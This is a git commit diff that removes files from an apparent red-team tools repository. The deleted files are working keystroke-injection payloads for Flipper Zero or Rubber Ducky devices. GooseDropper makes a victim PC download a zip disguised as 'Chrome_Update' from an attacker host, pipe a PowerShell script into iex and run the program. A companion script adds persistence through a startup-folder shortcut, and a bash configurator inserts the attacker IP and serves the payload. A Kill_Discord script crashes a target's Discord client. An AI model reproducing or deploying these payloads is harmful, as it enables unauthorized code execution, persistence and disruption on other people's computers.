Initial commit

2023-10-29 01:09:20 -06:00
8 changed files with 2 additions and 172 deletions
@@ -1,23 +0,0 @@
 REM TITLE GooseDropper
 REM AUTHOR Fr3ki
 REM DESCRIPTION Grab the Desktop Goose executable from an attacker machine and run it on the victim PC
 DELAY 500
 GUI r
 DELAY 500
 STRING powershell wget YOUR_IP:1337/Chrome_Update.zip -OutFile $ENV:Temp/Update.zip
 ENTER
 DELAY 8000
 GUI r
 DELAY 500
 STRING powershell Expand-Archive $ENV:Temp\Update.zip -DestinationPath $ENV:Temp\Chrome_Update
 ENTER
 DELAY 3000
 GUI r
 DELAY 500
 STRING powershell gc $env:Temp\Chrome_Update\Update\PersistentGoose.ps1 | iex
 ENTER
 DELAY 1000
 GUI r
 DELAY 500
 STRING %Temp%\Chrome_Update\Update\GooseDesktop.exe
 ENTER
@@ -1,6 +0,0 @@
 $WScriptShell = New-Object -ComObject WScript.Shell
 $TargetFile = "$env:Temp\Chrome_Update\Update\GooseDesktop.exe"
 $ShortcutFile = "C:\Users\$env:UserName\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HONK.lnk"
 $Shortcut = $WScriptShell.CreateShortcut($ShortcutFile)
 $Shortcut.TargetPath = $TargetFile
 $Shortcut.Save()
@@ -1,32 +0,0 @@
 **======= Goose Dropper v2.0 ========**
 This is a duckyscript originally designed for Flipper-Zero to drop Desktop Goose (by Samperson) on a Windows PC. **NOW WITH PERSISTENCE**
 ------------------------------------------------------------------------------------------------------
 Currently there is no auto-configurator for Windows but it's in the works. Steps to configure manually:
    1) Replace the YOUR_IP value in GooseDropper.txt with your IP.
    2) Download Desktop Goose and extract it, rename the 'DesktopGoose v.031' folder from inside the zip to Update.
    3) Copy PersistentGoose.ps1 into the newly renamed Update folder.
    4) Re-ZIP the Update directory and name it Chrome_Updater.
    5) Start some form of simple webserver/fileshare on port 1337 (or change the port to reflect your choice).
    6) Copy to your Flipper or Rubber-Ducky and PWN!
 --------------------------------------------------------------------------------------------------------------
 **Important Notes:**
 Ensure configuration is run while on the same network as your target, re-configure with each new network, unless the download location provided is publicly accessible.
 All credit goes to Samperson for the development of Desktop Goose: https://itch.io/profile/samperson | https://twitter.com/samnchiet
 **=== v2.0 Notes ==**
    Added persistence via a PowerShell script that makes a shortcut in the startup folder.
    Revamped updater with more options and better dialogue. 
    Bugfixes to ensure payloads get delivered successfully.
@@ -1,90 +0,0 @@
 #!/bin/bash
 #Determine the source of the DesktopGoose download
 echo "1) Local Webserver | 2) Persistant URL"
 read -p "Select a download source [1/2]: " DL
 if [ "${DL}" == "1" ];
 then
 	echo "Grabbing your IP"
 	#Grab your local IP to add to the payload
 	SRC="$(ip route show | grep default | cut -d ' ' -f 9)"
 	#Add your IP to the payload
 	sed -i "s/YOUR_IP/$SRC/" GooseDropper.txt
 	sleep 5s && clear
 elif [ "${DL}" == "2" ];
 then
 	#Get your URL
 	read -p "Enter your URL: " SRC
 	SRC="$(echo "$SRC" | sed 's/\//\\\//g')"
 	#Add your URL to the payload
 	sed -i "s/powershell wget YOUR_IP:1337\/Chrome_Update.zip -OutFile \$ENV:Temp\/Update.zip/powershell \"wget \'${SRC}\' -OutFile \$ENV:Temp\/Update.zip\"/" GooseDropper.txt
 	#Remind users to have the zip ready
 	echo "Please ensure a ZIP file with proper contents and formatting is hosted at the provided URL"
 	sleep 5s && clear
 else
 	echo "Please enter a valid selection"
 	exit
 fi
 read -p "Create ZIP file to deliver Desktop Goose? [Y/N]: " COMP
 #Check if Desktop Goose is present in this directory
 GOOSE="$(ls | grep 'Desktop Goose v0.31.zip')"
 if [ "${COMP,,}" == "y" ];
 then
 	if [ "${GOOSE}" == "" ];
 	then
 		echo "Desktop Goose is not present in this directory, download it, or move it here"
 		exit
 	else
 		unzip "Desktop Goose v0.31.zip"
 		mv "Desktop Goose v0.31/DesktopGoose v0.31" Update
 		mv PersistentGoose.ps1 Update/
 		zip -r Chrome_Update.zip Update
 		rm -rf "Desktop Goose v0.31"* Update
 		clear
 	fi
 else
 	break
 fi
 read -p "Configure Persistence? [Y/N]: " PERSIST
 if [ "${PERSIST,,}" == "n" ];
 then
 	sed -i "15d;16d;17d;18d;19d" GooseDropper.txt
 else
 	break
 fi
 if [ "${DL}" == "1" ];
 then
 	clear
 	read -p "Configuration finished! Start python webserver now? [Y/N]: " START
 	clear
 else
 	clear
 	break
 fi
 if [ "${START,,}" == "y" ];
 then
 	echo "Starting Server... Happy PWNing! (don't be a skid)"
 	python3 -m http.server 1337 && echo "PWNED!"
 else
 	clear
 	echo "Finished... Happy PWNing! (don't be a skid)!"
 fi
@@ -1,9 +0,0 @@
 Kill_Discord is a duckyscript that does exactly what the name implies.
 As of April 2024 the string "http://./\<#0>:  ://./<#0>" without the quotes will crash your Discord client when pasted into any message box.
 This script opens Discord on the target machine and pastes that string into the first available text box.
 Just to reitterate this crashes the Discord client of the SENDER, hence the need for a duckyscript.
 As always, don't be a skid, and only use these scripts on devices which you are expresely authorized to use them on. I am not liable for any unauthorized usage or damage caused by the usage of this tool.
@@ -1,12 +0,0 @@
 DELAY 500
 GUI r
 DELAY 500
 STRING C:\ProgramData\%USERNAME%\Discord\Update.exe --processStart Discord.exe
 DELAY 500
 ENTER
 DELAY 2000
 CTRL k
 DELAY 100
 ENTER
 DELAY 500
 STRING http://./\<#0>:  ://./<#0>
@@ -0,0 +1,2 @@
 # Misadventures
 Red/Purple-Team tools